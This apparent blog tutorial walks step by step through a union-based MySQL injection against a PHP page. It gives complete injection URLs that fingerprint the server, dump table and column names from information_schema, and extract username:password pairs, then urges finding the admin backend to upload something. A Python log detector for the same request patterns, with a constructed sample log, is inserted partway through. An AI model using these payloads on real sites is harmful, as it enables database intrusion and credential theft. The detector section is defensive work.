First, a look at what each MySQL version range allows:
Below 4.0: no support for UNION queries.
4.0 and above: the PHP setting magic_quotes_gpc defaults to on (magic_quotes_gpc = on). When magic_quotes_gpc is On in php.ini, every ' (single quote), " (double quote), \ (backslash) and NUL character in the submitted variables is automatically escaped with a backslash; for example, ' becomes \'. That puts a lot of obstacles in the way of injection.
5.0 and above: statements can dump table and column names (via information_schema) and support cross-database queries.
Step 1:
Exploit the injection point with a UNION query
http://localhost/list.php?id=600 order by 9 and 1=2 union select 1,2,3,4,5,6,7,8,9
The page then shows some of these numbers in certain places. As to why the "and 1=2" is needed to make the numbers appear, I reasoned it through myself: the first query has to come up empty, and "and 1=2" is a condition that no record satisfies, so the result of the second query after the UNION is what gets displayed.
Step 2:
Query useful information such as the database version
http://localhost/list.php?id=600 order by 9 and 1=2 union select 1,version(),database(),4,user(),6,@@version_compile_os,8,9
Check which fields are displayed on the page and replace those positions. Do the version, database name, current user and operating system show up? Once we know the database version is later than 5.0, we move on to dumping the table and column names; it is fast and there is no guessing.
Step 3:
Dumping table names
and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=<database name converted to hexadecimal>
I don't really understand MySQL statements, so let's just read the English and guess what it means. information_schema: MySQL ships with many built-in tables. table_schema literally reads as "the set of tables". Then the whole sentence joins up as: list the table names from the "table set". That is the only way I can explain it; for details on how this function is used I give the link at the end, please refer to it!
To get the table names to appear on the page, combine this with the union query from step 2 and construct:
http://localhost/list.php?id=600 order by 9 and 1=2 union select 1,group_concat(table_name),database(),4,user(),6,@@version_compile_os,8,9 from information_schema.tables where table_schema=<database name converted to hexadecimal>
and the table names are listed on the page. Trust me on that; no screenshot.
Step 4:
Dumping column names
and 1=2 union select group_concat(column_name) from information_schema.columns where table_name=<table name converted to hexadecimal>
Again the result has to land in a field that is displayed on the page. The constructed request:
http://localhost/list.php?id=600 order by 9 and 1=2 union select 1,group_concat(column_name),database(),4,user(),6,@@version_compile_os,8,9 from information_schema.columns where table_name=<table name converted to hexadecimal>
Step 5:
Dumping column contents
union select 1,group_concat(username,0x3a,password),3,4,5 from <table name>
Run the following:
http://localhost/list.php?id=600 order by 9 and 1=2 union select 1,group_concat(username,0x3a,password),database(),4,user(),6,@@version_compile_os,8,9 from <table name>
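As an added example that is not part of the original post: a small Python detector that looks for the request shapes the five steps above rely on (the order-by column probe, UNION SELECT, the version()/database()/user()/@@version_compile_os fingerprint, information_schema, group_concat and hex-encoded names) in web-server access-log lines. The log lines are constructed and the indicator names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators of the union-based probing walked through above (name -> regex), matched
# against the URL-decoded, lower-cased, whitespace-collapsed query-string values.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "mysql_fingerprint": re.compile(r"@@version_compile_os|\b(?:version|database|user)\(\)"),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "group_concat": re.compile(r"\bgroup_concat\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
}
# Common log format: client ip, method, request target, status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def decode_query(target):
    """All query-string values of a request target as one normalised string."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes %XX and '+'
    text = " ".join(v for values in params.values() for v in values)
    text = text.replace("/**/", " ")  # an inline comment must not split or hide a keyword
    return re.sub(r"\s+", " ", text).lower()

def scan_request(target):
    """Names of the indicators present in one request target (empty list if clean)."""
    decoded = decode_query(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan_log(log_text):
    """(client ip, request target, indicators) for each line tripping at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        found = scan_request(m.group(3)) if m else []
        if found:
            hits.append((m.group(1), m.group(3), found))
    return hits

# Constructed sample access log (not from the original post): lines 2-4 replay the
# post's step 1-3 requests; lines 1 and 5 are ordinary traffic that must stay unflagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /list.php?id=600 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /list.php?id=600%20order%20by%209 HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /list.php?id=600%20and%201=2%20union%20select%201,version(),database(),4,user(),6,@@version_compile_os,8,9 HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /list.php?id=600%20and%201=2%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=0x74657374 HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+jack HTTP/1.1" 200 300
"""
if __name__ == "__main__":
    for ip, target, found in scan_log(SAMPLE_LOG):
        print(ip, ",".join(found), target)
```

A single indicator such as the order-by probe is only a weak signal on its own; the same client tripping several of them in sequence, as in the sample, is what makes the pattern worth alerting on.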
Conclusion:
By now I think you have the administrator's username and password; next, find the admin backend, log in, and look for somewhere to upload something.
Postscript:
Background used in this article:
1. What is information_schema in MySQL? http://www.bkjia.com/database/201305/212034.html
2. A summary of the group_concat() function: http://www.bkjia.com/database/201305/212035.html